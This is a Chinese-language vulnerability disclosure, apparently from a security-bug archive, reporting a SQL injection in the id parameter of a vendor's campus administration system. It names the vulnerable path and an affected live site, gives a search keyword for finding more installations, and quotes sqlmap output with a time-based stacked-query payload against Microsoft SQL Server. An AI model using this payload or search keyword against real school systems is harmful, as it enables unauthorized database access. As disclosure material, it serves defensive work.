某通用型校园校务系统SQL注入之二

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: boom!!! ### 详细说明: 厂商:南京苏亚星资讯科技开发有限公司 漏洞位于:/SM2005/jiaoshi/InfoSet/Left.asp?id= id参数没有过滤,导致注射。 直接访问http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/ 有个越权报错,查看源代码可以拼接成注入链接 [<img src="https://images.seebug.org/upload/201411/13091108f5b6000ea1fc1723fd4b7b85fbd630e9.png" alt="111.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/13091108f5b6000ea1fc1723fd4b7b85fbd630e9.png) [<img src="https://images.seebug.org/upload/201411/13091145db1b472004905f0032f5d943818830b3.png" alt="222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/13091145db1b472004905f0032f5d943818830b3.png) 百度关键字:/SM2005 列举5个案例证明通用性: http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/Left.asp?id=0 Place: GET Parameter: id Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=0'; WAITFOR DELAY '0:0:5';-- --- [09:14:20] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息